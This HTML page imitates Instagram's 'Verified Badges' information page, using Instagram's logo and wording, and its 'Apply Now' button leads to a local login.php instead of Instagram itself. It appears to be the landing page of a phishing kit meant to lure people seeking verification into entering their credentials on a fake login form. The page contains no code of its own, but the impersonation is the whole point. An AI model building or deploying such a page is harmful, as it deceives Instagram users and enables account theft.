<!DOCTYPE html>
<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=5, viewport-fit=cover"/>
	<meta charset="utf-8"/>
	<title> Verified Badges • Instagram </title>
	<link rel="shortcut icon"  href="icon.png"/>
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
	<center>
<div class="top">
<a href="https://instagram.com"><img id="logo" src="logo.png"></a>
</div>
<div class="box">
<img id="box" src="logo.png">
<br/><br/><br/>
<span id="header">Verified Badges</span>
<br/><br/><br/>
<p id="inbox">A verified badge is a check that appears next to an Instagram account's name in search and on the profile. It means that Instagram has confirmed that this is the authentic account for the public figure, celebrity or global brand it represents.
Accounts representing well-known figures and brands are verified because they have a high likelihood of being impersonated. We want to make sure that people in the Instagram community can easily find the authentic people and brands they want to follow.</p>
<br/>
<a href="login.php"><button>Apply Now</button></a>
</div>
</center>
</body>
</html>